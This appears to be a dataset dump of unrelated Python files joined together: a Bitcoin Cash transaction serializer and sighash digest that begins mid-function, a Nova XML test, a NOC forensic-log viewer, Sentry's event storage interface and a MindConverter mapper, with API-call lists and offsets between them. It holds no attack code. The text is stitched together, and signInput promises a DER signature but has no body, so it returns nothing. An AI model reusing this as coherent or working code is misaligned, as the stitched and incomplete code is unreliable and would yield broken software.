b0 = mv[offset]
if b0 < 0xfd:
return b0, offset+1
elif b0 == 0xfd:
return read_ule2(mv, offset+1)
elif b0 == 0xfe:
return read_ule4(mv, offset+1)
elif b0 == 0xff:
return read_ule8(mv, offset+1)
class SimpleTx:
""" A lower-level bitcoin transaction ser/des.
This only uses bytes objects. It does not ever parse scripts, so
you can use all manner of weird scripts.
You can correctly calculate the preimages used in OP_CHECKSIG, for
any hashtype (SIGHASH ALL/NONE/SINGLE and/or ANYONECANPAY).
All `inputs` elements are dicts with 'prevout_hash' (bytes len 32),
'prevout_n' (int), 'prevout_value' (int), 'scriptsig' (bytes),
'sequence' (int).
'prevout_value' and 'scriptsig' are semi-optional, being needed by
different member functions.
All `outputs` elements are dicts with 'value' (int) and 'scriptpubkey' (bytes).
"""
forkid = 0x000000
def __init__(self, version,inputs,outputs,locktime):
self.version = int(version)
self.inputs = inputs
self.outputs = outputs
self.locktime = locktime
self.digest_cache = {}
@classmethod
def from_bytes(cls, raw, error_extra=True):
raw = bytes(raw)
mv = memoryview(raw)
offset = 0
version, offset = read_ule4(mv, offset)
ninputs, offset = read_var_int(mv, offset)
if ninputs*37 > len(raw)-offset: # sanity check in case ninputs is 4 billion
raise struct.error('Number of inputs too large')
inputs = [None]*ninputs
for i in range(ninputs):
ph, offset = read_nbytes(mv, 32, offset)
pn, offset = read_ule4(mv, offset)
scriptlen, offset = read_var_int(mv, offset)
script, offset = read_nbytes(mv, scriptlen, offset)
sequence, offset = read_ule4(mv, offset)
inputs[i] = dict(prevout_hash=ph[::-1], prevout_n = pn, scriptsig=script, sequence=sequence)
noutputs, offset = read_var_int(mv, offset)
if noutputs*5 > len(raw)-offset: # sanity check in case noutputs is 4 billion
raise struct.error('Number of outputs too large')
outputs = [None]*noutputs
for i in range(noutputs):
value, offset = read_ule8(mv, offset)
scriptlen, offset = read_var_int(mv, offset)
script, offset = read_nbytes(mv, scriptlen, offset)
outputs[i] = dict(value=value, scriptpubkey=script)
locktime, offset = read_ule4(mv,offset)
if error_extra and len(mv) > offset:
raise ValueError("extra bytes found after transaction")
self = cls(version,inputs,outputs,locktime)
self.raw = bytes(mv[:offset]) # Save the raw bytes up to this offset.
return self
def to_bytes(self,):
""" Returns byte serialized transaction as appropriate for broadcast.
(note that most broadcasting APIs expect hex)
If scriptsig is missing on any inputs this will fail.
"""
return b''.join(self.serialize_parts())
def digestInput(self, i, nhashtype, scriptcode, double_hashing = True):
"""
Return the 32-byte digest for a given input, in given sighash mode.
You need this to create/verify CHECKSIG signatures.
The specified input (by index `i`) must have a 'prevout_value' entry.
It does *not* need a scriptsig.
nhashtype is an integer 0-255.
This is bitcoin cash so you must include SIGHASH_FORKID.
`scriptcode` needs to be provided. It is defined as the currently
executing script taken from the last OP_CODESEPARATOR, if present.
For P2SH, 'currently executing script' is defined as the redeemscript.
        If 'double_hashing' is set to false, a single SHA256 of the preimage is
        returned instead. This can be useful when checking signed transactions
        with CHECKDATASIG, which verifies over a single SHA256.
Important: The digestInput result generally depends on the other
inputs and outputs, except for special cases of nhashtype. Make sure
you do not call it before you settle these things.
"""
# Following this procedure:
# https://github.com/bitcoincashorg/bitcoincash.org/blob/master/spec/replay-protected-sighash.md
i = int(i)
nhashtype = int(nhashtype)
scriptcode = bytes(scriptcode)
cache = self.digest_cache
cache_id = (i, nhashtype, scriptcode, double_hashing)
try:
return cache[cache_id]
except KeyError:
pass
self.inputs = tuple(self.inputs)
self.outputs = tuple(self.outputs)
inp = self.inputs[i]
try:
value = inp['prevout_value']
except KeyError:
raise ValueError("Missing prevout_value -- cannot digest.", inp)
assert 0 <= nhashtype <= 0xff
        if not nhashtype & SIGHASH_FORKID:
            raise ValueError("Missing SIGHASH_FORKID. Digest in non-forkid mode not implemented!")
        basetype = nhashtype & 0x1f  # mask off ANYONECANPAY/FORKID bits to get the base sighash type
if nhashtype & SIGHASH_ANYONECANPAY:
hashPrevouts = zero32
hashSequence = zero32
else:
try:
hashPrevouts = cache['hashPrevouts']
except KeyError:
hashPrevouts = cache['hashPrevouts'] = self.hashPrevouts()
            if basetype != SIGHASH_NONE and basetype != SIGHASH_SINGLE:
                try:
                    hashSequence = cache['hashSequence']
                except KeyError:
                    hashSequence = cache['hashSequence'] = self.hashSequence()
            else:
                # SINGLE/NONE commit to a zeroed sequence hash per the sighash spec
                hashSequence = zero32
if basetype != SIGHASH_NONE and basetype != SIGHASH_SINGLE:
try:
hashOutputs = cache['hashOutputs']
except KeyError:
hashOutputs = cache['hashOutputs'] = self.hashOutputs()
elif basetype == SIGHASH_SINGLE and i < len(self.outputs):
            hashOutputs = hash256(b''.join(self.serialize_parts_output(self.outputs[i])))
else:
hashOutputs = zero32
self.digest_parts = [
int_to_ule4(self.version),
hashPrevouts,
hashSequence,
inp['prevout_hash'][::-1],
int_to_ule4(inp['prevout_n']),
var_int(len(scriptcode)),
scriptcode,
int_to_ule8(value),
int_to_ule4(inp['sequence']),
hashOutputs,
int_to_ule4(self.locktime),
int_to_ule4(nhashtype | (self.forkid << 8))]
self.joined_digest_parts = b''.join(self.digest_parts)
digest = [sha256, hash256][double_hashing](self.joined_digest_parts)
cache[cache_id] = digest
return digest
def signInput(self, i, nhashtype, private_key):
""" Signs transaction using the given private key, as appropriate for
using in OP_CHECKSIG.
Returns the ~71 byte DER signature in low S form. This
does not make scriptsig however -- that is up to you!
"""
def hashPrevouts(self,):
flatten = chain.from_iterable
return hash256(b''.join(flatten(
(inp['prevout_hash'][::-1], int_to_ule4(inp['prevout_n'])) for inp in self.inputs
)))
def hashSequence(self,):
return hash256(b''.join(
int_to_ule4(inp['sequence']) for inp in self.inputs)
)
def hashOutputs(self,):
flatten = chain.from_iterable
return hash256(b''.join(flatten(
self.serialize_parts_output(out) for out in self.outputs)))
@staticmethod
def serialize_parts_input(inp):
"""Returns five bytes objects"""
scriptsig = inp['scriptsig']
return (inp['prevout_hash'][::-1],
int_to_ule4(inp['prevout_n']),
var_int(len(scriptsig)),
scriptsig,
int_to_ule4(inp['sequence']),
)
@staticmethod
def serialize_parts_output(out):
"""Returns three bytes objects"""
outscript = out['scriptpubkey']
return (int_to_ule8(out['value']),
var_int(len(outscript)),
outscript
)
def serialize_parts(self,):
"""Like serialize but returns all pieces in tuples."""
flatten = chain.from_iterable
return chain(
(int_to_ule4(self.version), var_int(len(self.inputs)), ),
flatten(self.serialize_parts_input(inp) for inp in self.inputs),
(var_int(len(self.outputs)), ),
flatten(self.serialize_parts_output(out) for out in self.outputs),
(int_to_ule4(self.locktime), ),
)
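# End-to-end sketch (the prevout hash, values and scripts below are hypothetical):
#   tx = SimpleTx(
#       version=2,
#       inputs=[dict(prevout_hash=b'\x11' * 32, prevout_n=0,
#                    prevout_value=100000, scriptsig=b'', sequence=0xffffffff)],
#       outputs=[dict(value=99000, scriptpubkey=b'\x6a')],
#       locktime=0)
#   digest = tx.digestInput(0, default_hashtype, scriptcode=b'\x51')
#   raw = tx.to_bytes()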
### Script helpers
def minpush(b):
""" Return minimal push form for bytes `b` in bitcoin script."""
l = len(b)
if l == 0:
return b'\x00'
elif l == 1:
if b[0] == 0x81: # 0x81 is pushed by OP_1NEGATE
return b'\x4f'
elif 0 < b[0] <= 16:
return int_to_ubyte(80 + b[0])
return b'\x01' + b
elif l < 0x4c:
return int_to_ubyte(l) + b
elif l <= 0xff:
return b'\x4c' + int_to_ubyte(l) + b
elif l <= 0xffff:
return b'\x4d' + int_to_ule2(l) + b
else:
return b'\x4e' + int_to_ule4(l) + b
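# Sanity checks for the branches above (exact values):
#   minpush(b'')     == b'\x00'      # OP_0 pushes the empty value
#   minpush(b'\x05') == b'\x55'      # OP_5
#   minpush(b'\x81') == b'\x4f'      # OP_1NEGATE
#   minpush(b'\xab') == b'\x01\xab'  # plain 1-byte push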
|
[
"struct.Struct",
"hashlib.sha256",
"hashlib.new",
"struct.error"
] |
[((448, 472), 'hashlib.new', 'hashlib.new', (['"""ripemd160"""'], {}), "('ripemd160')\n", (459, 472), False, 'import hashlib\n'), ((816, 834), 'struct.Struct', 'struct.Struct', (['"""B"""'], {}), "('B')\n", (829, 834), False, 'import struct\n'), ((855, 874), 'struct.Struct', 'struct.Struct', (['"""<H"""'], {}), "('<H')\n", (868, 874), False, 'import struct\n'), ((895, 914), 'struct.Struct', 'struct.Struct', (['"""<L"""'], {}), "('<L')\n", (908, 914), False, 'import struct\n'), ((935, 954), 'struct.Struct', 'struct.Struct', (['"""<Q"""'], {}), "('<Q')\n", (948, 954), False, 'import struct\n'), ((1069, 1090), 'struct.Struct', 'struct.Struct', (['format'], {}), '(format)\n', (1082, 1090), False, 'import struct\n'), ((1522, 1551), 'struct.error', 'struct.error', (['"""too few bytes"""'], {}), "('too few bytes')\n", (1534, 1551), False, 'import struct\n'), ((392, 409), 'hashlib.sha256', 'hashlib.sha256', (['b'], {}), '(b)\n', (406, 409), False, 'import hashlib\n'), ((3663, 3705), 'struct.error', 'struct.error', (['"""Number of inputs too large"""'], {}), "('Number of inputs too large')\n", (3675, 3705), False, 'import struct\n'), ((4307, 4350), 'struct.error', 'struct.error', (['"""Number of outputs too large"""'], {}), "('Number of outputs too large')\n", (4319, 4350), False, 'import struct\n')]
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 <NAME>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
from nova.api.openstack import common
from nova.api.openstack import xmlutil
from nova.openstack.common import log as logging
from nova.tests.integrated import integrated_helpers
LOG = logging.getLogger(__name__)
class XmlTests(integrated_helpers._IntegratedTestBase):
""""Some basic XML sanity checks."""
def test_namespace_limits(self):
headers = {}
headers['Accept'] = 'application/xml'
response = self.api.api_request('/limits', headers=headers)
data = response.read()
LOG.debug("data: %s" % data)
root = etree.XML(data)
self.assertEqual(root.nsmap.get(None), xmlutil.XMLNS_COMMON_V10)
def test_namespace_servers(self):
# /servers should have v1.1 namespace (has changed in 1.1).
headers = {}
headers['Accept'] = 'application/xml'
response = self.api.api_request('/servers', headers=headers)
data = response.read()
LOG.debug("data: %s" % data)
root = etree.XML(data)
self.assertEqual(root.nsmap.get(None), common.XML_NS_V11)
|
[
"lxml.etree.XML",
"nova.openstack.common.log.getLogger"
] |
[((878, 905), 'nova.openstack.common.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (895, 905), True, 'from nova.openstack.common import log as logging\n'), ((1262, 1277), 'lxml.etree.XML', 'etree.XML', (['data'], {}), '(data)\n', (1271, 1277), False, 'from lxml import etree\n'), ((1678, 1693), 'lxml.etree.XML', 'etree.XML', (['data'], {}), '(data)\n', (1687, 1693), False, 'from lxml import etree\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from solution import Solution
inpt = "()(())"
sol = Solution()
res = sol.longestValidParentheses(inpt)
print(res)
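# Prints 6: the whole of "()(())" is a valid parentheses sequence.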
|
[
"solution.Solution"
] |
[((100, 110), 'solution.Solution', 'Solution', ([], {}), '()\n', (108, 110), False, 'from solution import Solution\n')]
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# forensic
# ----------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
from __future__ import print_function
import sys
import re
from collections import namedtuple
import operator
import time
# Third-party modules
import six
# NOC modules
from noc.core.management.base import BaseCommand
SpanData = namedtuple("SpanData", ["ts", "id", "server", "service", "label"])
class Command(BaseCommand):
rx_open = re.compile(
r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d+) \[noc\.core\.forensic\] "
r"\[>([^\|]+)\|([^\|]+)\|([^\]]+)\]\s*(.*)"
)
rx_close = re.compile(
r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d+) \[noc\.core\.forensic\] " r"\[<([^\]]+)\]"
)
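    # The patterns above match forensic log lines of the form (illustrative):
    #   2018-01-01 12:00:00,123 [noc.core.forensic] [>SPANID|server-1|svc-web] span label
    #   2018-01-01 12:00:01,456 [noc.core.forensic] [<SPANID]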
show_mask = "%-23s %-25s %-15s %-30s %s"
show_watch_mask = "%-23s %6s %-25s %-15s %-30s %s"
time_format = "%Y-%m-%d %H:%M:%S"
REFRESH_INTERVAL = 1
def add_arguments(self, parser):
subparsers = parser.add_subparsers(dest="cmd", help="sub-commands help")
# sync
incomplete_parser = subparsers.add_parser("incomplete", help="Show incomplete operations")
incomplete_parser.add_argument("--watch", action="store_true", help="Watch mode")
def handle(self, cmd, *args, **options):
getattr(self, "handle_%s" % cmd)(*args, **options)
def handle_incomplete(self, watch=False, *args, **kwargs):
def show():
self.print(
"\x1b[2J\x1b[1;1H%s Spans: %d/%d" % (time.strftime("%H:%M:%S"), n_closed, n_open)
)
self.print(self.show_mask % ("Timestamp", "ID", "Server", "Service", "Label"))
for s in sorted(six.itervalues(spans), key=operator.attrgetter("ts")):
self.print(self.show_mask % (s.ts, s.id, s.server, s.service, s.label))
if not spans:
self.print(" No spans")
def show_watch():
now = time.time()
self.print(
"\x1b[2J\x1b[1;1H%s Spans: %d/%d" % (time.strftime("%H:%M:%S"), n_closed, n_open)
)
self.print(
self.show_watch_mask % ("Timestamp", "Dur", "ID", "Server", "Service", "Label")
)
for s in sorted(six.itervalues(spans), key=operator.attrgetter("ts")):
ts = time.mktime(time.strptime(s.ts.split(",", 1)[0], self.time_format))
duration = str(int(now - ts))
self.print(
self.show_watch_mask % (s.ts, duration, s.id, s.server, s.service, s.label)
)
if not spans:
self.print(" No spans")
spans = {}
next_show = 0
n_open = 0
n_closed = 0
for line in sys.stdin:
line = line.strip()
if "[noc.core.forensic] [>" in line:
# Open span
match = self.rx_open.search(line)
if match:
s = SpanData(
ts=match.group(1),
id=match.group(2),
server=match.group(3),
service=match.group(4),
label=match.group(5),
)
spans[s.id] = s
n_open += 1
elif "[noc.core.forensic] [<" in line:
# Close span
match = self.rx_close.search(line)
if match:
sid = match.group(2)
if sid in spans:
del spans[sid]
n_closed += 1
elif "[noc.core.forensic] [=Process restarted]" in line:
# Process restarted, clear spans
if not watch:
show()
self.print("===[ Process Restarted ]==============")
# Reset spans
spans = {}
next_show = 0
n_open = 0
n_closed = 0
if watch:
t = time.time()
if t > next_show:
next_show = t + self.REFRESH_INTERVAL
show_watch()
if watch:
show_watch()
else:
show()
if __name__ == "__main__":
Command().run()
|
[
"time.strftime",
"time.time",
"operator.attrgetter",
"six.itervalues",
"collections.namedtuple",
"re.compile"
] |
[((572, 638), 'collections.namedtuple', 'namedtuple', (['"""SpanData"""', "['ts', 'id', 'server', 'service', 'label']"], {}), "('SpanData', ['ts', 'id', 'server', 'service', 'label'])\n", (582, 638), False, 'from collections import namedtuple\n'), ((683, 832), 're.compile', 're.compile', (['"""(\\\\d{4}-\\\\d{2}-\\\\d{2} \\\\d{2}:\\\\d{2}:\\\\d{2},\\\\d+) \\\\[noc\\\\.core\\\\.forensic\\\\] \\\\[>([^\\\\|]+)\\\\|([^\\\\|]+)\\\\|([^\\\\]]+)\\\\]\\\\s*(.*)"""'], {}), "(\n '(\\\\d{4}-\\\\d{2}-\\\\d{2} \\\\d{2}:\\\\d{2}:\\\\d{2},\\\\d+) \\\\[noc\\\\.core\\\\.forensic\\\\] \\\\[>([^\\\\|]+)\\\\|([^\\\\|]+)\\\\|([^\\\\]]+)\\\\]\\\\s*(.*)'\n )\n", (693, 832), False, 'import re\n'), ((846, 963), 're.compile', 're.compile', (['"""(\\\\d{4}-\\\\d{2}-\\\\d{2} \\\\d{2}:\\\\d{2}:\\\\d{2},\\\\d+) \\\\[noc\\\\.core\\\\.forensic\\\\] \\\\[<([^\\\\]]+)\\\\]"""'], {}), "(\n '(\\\\d{4}-\\\\d{2}-\\\\d{2} \\\\d{2}:\\\\d{2}:\\\\d{2},\\\\d+) \\\\[noc\\\\.core\\\\.forensic\\\\] \\\\[<([^\\\\]]+)\\\\]'\n )\n", (856, 963), False, 'import re\n'), ((2145, 2156), 'time.time', 'time.time', ([], {}), '()\n', (2154, 2156), False, 'import time\n'), ((1890, 1911), 'six.itervalues', 'six.itervalues', (['spans'], {}), '(spans)\n', (1904, 1911), False, 'import six\n'), ((2455, 2476), 'six.itervalues', 'six.itervalues', (['spans'], {}), '(spans)\n', (2469, 2476), False, 'import six\n'), ((4248, 4259), 'time.time', 'time.time', ([], {}), '()\n', (4257, 4259), False, 'import time\n'), ((1917, 1942), 'operator.attrgetter', 'operator.attrgetter', (['"""ts"""'], {}), "('ts')\n", (1936, 1942), False, 'import operator\n'), ((2482, 2507), 'operator.attrgetter', 'operator.attrgetter', (['"""ts"""'], {}), "('ts')\n", (2501, 2507), False, 'import operator\n'), ((1712, 1737), 'time.strftime', 'time.strftime', (['"""%H:%M:%S"""'], {}), "('%H:%M:%S')\n", (1725, 1737), False, 'import time\n'), ((2234, 2259), 'time.strftime', 'time.strftime', (['"""%H:%M:%S"""'], {}), "('%H:%M:%S')\n", (2247, 2259), False, 'import time\n')]
|
from __future__ import absolute_import
from copy import deepcopy
import sentry_sdk
from sentry import nodestore
from sentry.snuba.events import Columns
from sentry.utils.services import Service
from .models import Event
class Filter(object):
"""
A set of conditions, start/end times and project, group and event ID sets
used to restrict the results of a Snuba query.
start (DateTime): Start datetime - default None
    end (DateTime): End datetime - default None
conditions (Sequence[Sequence[str, str, Any]]): List of conditions to fetch - default None
    having (Sequence[Sequence[str, str, Any]]): List of having conditions to filter by - default None
project_ids (Sequence[int]): List of project IDs to fetch - default None
group_ids (Sequence[int]): List of group IDs to fetch - default None
event_ids (Sequence[int]): List of event IDs to fetch - default None
selected_columns (Sequence[str]): List of columns to select
aggregations (Sequence[Any, str|None, str]): Aggregate functions to fetch.
groupby (Sequence[str]): List of columns to group results by
"""
def __init__(
self,
start=None,
end=None,
conditions=None,
having=None,
project_ids=None,
group_ids=None,
event_ids=None,
selected_columns=None,
aggregations=None,
rollup=None,
groupby=None,
orderby=None,
):
self.start = start
self.end = end
self.conditions = conditions
self.having = having
self.project_ids = project_ids
self.group_ids = group_ids
self.event_ids = event_ids
self.rollup = rollup
self.selected_columns = selected_columns if selected_columns is not None else []
self.aggregations = aggregations if aggregations is not None else []
self.groupby = groupby
self.orderby = orderby
@property
def filter_keys(self):
"""
Get filter_keys value required for raw snuba query
"""
filter_keys = {}
if self.project_ids:
filter_keys["project_id"] = self.project_ids
if self.group_ids:
filter_keys["group_id"] = self.group_ids
if self.event_ids:
filter_keys["event_id"] = self.event_ids
return filter_keys
@property
def date_params(self):
"""
Get the datetime parameters as a dictionary
"""
return {"start": self.start, "end": self.end}
def update_with(self, updates):
keys = ("selected_columns", "aggregations", "conditions", "orderby", "groupby")
for key in keys:
if key in updates:
setattr(self, key, updates[key])
def clone(self):
return deepcopy(self)
class EventStorage(Service):
__all__ = (
"minimal_columns",
"create_event",
"get_event_by_id",
"get_events",
"get_unfetched_events",
"get_prev_event_id",
"get_next_event_id",
"get_earliest_event_id",
"get_latest_event_id",
"bind_nodes",
)
# The minimal list of columns we need to get from snuba to bootstrap an
# event. If the client is planning on loading the entire event body from
# nodestore anyway, we may as well only fetch the minimum from snuba to
# avoid duplicated work.
minimal_columns = [Columns.EVENT_ID, Columns.GROUP_ID, Columns.PROJECT_ID, Columns.TIMESTAMP]
def get_events(
self,
snuba_filter,
orderby=None,
limit=100,
offset=0,
referrer="eventstore.get_events", # NOQA
):
"""
Fetches a list of events given a set of criteria.
Arguments:
snuba_filter (Filter): Filter
orderby (Sequence[str]): List of fields to order by - default ['-time', '-event_id']
limit (int): Query limit - default 100
offset (int): Query offset - default 0
referrer (string): Referrer - default "eventstore.get_events"
"""
raise NotImplementedError
def get_unfetched_events(
self,
snuba_filter,
orderby=None,
limit=100,
offset=0,
referrer="eventstore.get_unfetched_events", # NOQA
):
"""
Same as get_events but returns events without their node datas loaded.
Only the event ID, projectID, groupID and timestamp field will be present without
an additional fetch to nodestore.
Used for fetching large volumes of events that do not need data loaded
from nodestore. Currently this is just used for event data deletions where
we just need the event IDs in order to process the deletions.
Arguments:
snuba_filter (Filter): Filter
orderby (Sequence[str]): List of fields to order by - default ['-time', '-event_id']
limit (int): Query limit - default 100
offset (int): Query offset - default 0
referrer (string): Referrer - default "eventstore.get_unfetched_events"
"""
raise NotImplementedError
def get_event_by_id(self, project_id, event_id):
"""
Gets a single event given a project_id and event_id.
Arguments:
project_id (int): Project ID
event_id (str): Event ID
"""
raise NotImplementedError
def get_next_event_id(self, event, snuba_filter): # NOQA
"""
Gets the next event given a current event and some conditions/filters.
Returns a tuple of (project_id, event_id)
Arguments:
event (Event): Event object
snuba_filter (Filter): Filter
"""
raise NotImplementedError
def get_prev_event_id(self, event, snuba_filter): # NOQA
"""
Gets the previous event given a current event and some conditions/filters.
Returns a tuple of (project_id, event_id)
Arguments:
event (Event): Event object
snuba_filter (Filter): Filter
"""
raise NotImplementedError
def get_earliest_event_id(self, event, snuba_filter): # NOQA
"""
Gets the earliest event given a current event and some conditions/filters.
Returns a tuple of (project_id, event_id)
Arguments:
event (Event): Event object
snuba_filter (Filter): Filter
"""
raise NotImplementedError
def get_latest_event_id(self, event, snuba_filter): # NOQA
"""
Gets the latest event given a current event and some conditions/filters.
Returns a tuple of (project_id, event_id)
Arguments:
event (Event): Event object
snuba_filter (Filter): Filter
"""
raise NotImplementedError
def create_event(self, project_id=None, event_id=None, group_id=None, data=None):
"""
Returns an Event from processed data
"""
return Event(project_id=project_id, event_id=event_id, group_id=group_id, data=data)
def bind_nodes(self, object_list, node_name="data"):
"""
For a list of Event objects, and a property name where we might find an
(unfetched) NodeData on those objects, fetch all the data blobs for
those NodeDatas with a single multi-get command to nodestore, and bind
the returned blobs to the NodeDatas.
It's not necessary to bind a single Event object since data will be lazily
fetched on any attempt to access a property.
"""
with sentry_sdk.start_span(op="eventstore.base.bind_nodes"):
object_node_list = [
(i, getattr(i, node_name)) for i in object_list if getattr(i, node_name).id
]
# Remove duplicates from the list of nodes to be fetched
node_ids = list({n.id for _, n in object_node_list})
if not node_ids:
return
node_results = nodestore.get_multi(node_ids)
for item, node in object_node_list:
data = node_results.get(node.id) or {}
node.bind_data(data, ref=node.get_ref(item))
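# Filter usage sketch (IDs below are hypothetical):
#   event_filter = Filter(project_ids=[1], group_ids=[42],
#                         conditions=[["type", "=", "error"]])
#   event_filter.filter_keys  # -> {"project_id": [1], "group_id": [42]}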
|
[
"sentry_sdk.start_span",
"copy.deepcopy",
"sentry.nodestore.get_multi"
] |
[((2786, 2800), 'copy.deepcopy', 'deepcopy', (['self'], {}), '(self)\n', (2794, 2800), False, 'from copy import deepcopy\n'), ((7527, 7581), 'sentry_sdk.start_span', 'sentry_sdk.start_span', ([], {'op': '"""eventstore.base.bind_nodes"""'}), "(op='eventstore.base.bind_nodes')\n", (7548, 7581), False, 'import sentry_sdk\n'), ((7937, 7966), 'sentry.nodestore.get_multi', 'nodestore.get_multi', (['node_ids'], {}), '(node_ids)\n', (7956, 7966), False, 'from sentry import nodestore\n')]
|
"""This is a decorator to show the time cost by the function"""
from functools import wraps
from time import time
def count_time(func):
"""print run time calculation"""
@wraps(func)
def count(*args, **kwargs):
"""record the time of both start and end,
print the cost time after finishing the function"""
time_start = time()
res = func(*args, **kwargs)
time_end = time()
print("\nThe time cost is : {:.3f}ms".format((time_end - time_start) * 1000))
return res
return count
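# Usage example (illustrative):
if __name__ == "__main__":
    @count_time
    def busy_sum():
        """Burn a little CPU so the timer has something to measure."""
        return sum(range(10 ** 6))

    busy_sum()  # prints e.g. "The time cost is : 12.345ms"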
|
[
"functools.wraps",
"time.time"
] |
[((181, 192), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (186, 192), False, 'from functools import wraps\n'), ((356, 362), 'time.time', 'time', ([], {}), '()\n', (360, 362), False, 'from time import time\n'), ((418, 424), 'time.time', 'time', ([], {}), '()\n', (422, 424), False, 'from time import time\n')]
|
# Copyright 2021 Huawei Technologies Co., Ltd.All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Mapper module."""
from mindconverter.graph_based_converter.common.utils import reset_template_and_exchange_msg
from mindconverter.graph_based_converter.constant import WeightType
from mindconverter.graph_based_converter.mapper.base import AtenToMindSporeMapper
class BroadcastToMapper(AtenToMindSporeMapper):
"""BroadcastTo mapper."""
@staticmethod
def _operation_name_in_ms(*args, **kwargs):
return "broadcast_to"
@staticmethod
def _convert_trained_weights(**kwargs):
weights = kwargs.get("weights", list())
args_name = ["input", "shape", "implicit"]
args_name_list = BroadcastToMapper.get_args_name_list(**kwargs, args_name=args_name)
trainable_params = dict()
for weight in weights:
trainable_params[args_name_list[weight.location]] = {"data": weight.value, "location": weight.location,
"type": WeightType.PARAMETER.value,
"onnx_name": weight.name}
return trainable_params
@staticmethod
def _generate_snippet_template(**kwargs):
template, exchange_msg, outputs_list, outputs_mapping = AtenToMindSporeMapper._generate_snippet_template(
**kwargs)
raw_params = kwargs.get("raw_params")
if not raw_params:
return template, exchange_msg, outputs_list, outputs_mapping
op = kwargs.get("operation")
trainable_params = kwargs.get("trainable_params", dict())
output_shape = raw_params.get("output_shape", tuple())
variable_slot = "var_0"
args_name = ["input", "shape", "implicit"]
inputs, args, group_inputs = BroadcastToMapper._params_parser(raw_params=raw_params,
args_name=args_name,
trainable_params=trainable_params)
args = BroadcastToMapper._get_args(variable_slot=variable_slot, inputs=inputs, args=args,
output_shape=output_shape)
init_template_list = [f"self.{{{variable_slot}}}_{arg_name} = {{{arg_name}}}" for arg_name in args]
parameters_declared = dict()
for name, trainable_param in trainable_params.copy().items():
value = trainable_param["data"]
if BroadcastToMapper.is_tensor(value):
variable_slot_param_name = f"{variable_slot}/{name}"
init_template_list.append(f"self.{{{variable_slot}}}_{name} = {{{variable_slot_param_name}}}")
parameters_declared[name] = ""
else:
args[name] = value.tolist()
init_template_list.append(f"self.{{{variable_slot}}}_{name} = {{{name}}}")
trainable_params.pop(name)
construct_template = f"opt_{{{variable_slot}}} = ms_np.{op}({inputs[0]}, ({', '.join(inputs[1:-1])}))"
template, exchange_msg = reset_template_and_exchange_msg(template, exchange_msg, variable_slot,
init_template_list, [construct_template], args,
trainable_params, parameters_declared, group_inputs)
return template, exchange_msg, outputs_list, outputs_mapping
@staticmethod
def _get_args(**kwargs):
"""Get args from params_parser."""
variable_slot = kwargs.get("variable_slot")
inputs = kwargs.get("inputs", list())
args = kwargs.get("args", dict())
output_shape = kwargs.get("output_shape", tuple())
shape_name_list = [ipt.replace(f"self.{{{variable_slot}}}_", "") for ipt in inputs[1:-1]]
for idx, shape_name in enumerate(shape_name_list):
if isinstance(args.get(shape_name), int) and args.get(shape_name) == -1:
args[shape_name] = output_shape[idx]
args.pop("implicit")
return args
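# For orientation, with variable_slot "var_0" the generated construct line takes
# the shape below (argument names are illustrative; the real ones are produced
# by _params_parser):
#   opt_var_0 = ms_np.broadcast_to(x, (self.var_0_shape_0, self.var_0_shape_1))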
|
[
"mindconverter.graph_based_converter.mapper.base.AtenToMindSporeMapper._generate_snippet_template",
"mindconverter.graph_based_converter.common.utils.reset_template_and_exchange_msg"
] |
[((1924, 1982), 'mindconverter.graph_based_converter.mapper.base.AtenToMindSporeMapper._generate_snippet_template', 'AtenToMindSporeMapper._generate_snippet_template', ([], {}), '(**kwargs)\n', (1972, 1982), False, 'from mindconverter.graph_based_converter.mapper.base import AtenToMindSporeMapper\n'), ((3729, 3908), 'mindconverter.graph_based_converter.common.utils.reset_template_and_exchange_msg', 'reset_template_and_exchange_msg', (['template', 'exchange_msg', 'variable_slot', 'init_template_list', '[construct_template]', 'args', 'trainable_params', 'parameters_declared', 'group_inputs'], {}), '(template, exchange_msg, variable_slot,\n init_template_list, [construct_template], args, trainable_params,\n parameters_declared, group_inputs)\n', (3760, 3908), False, 'from mindconverter.graph_based_converter.common.utils import reset_template_and_exchange_msg\n')]
|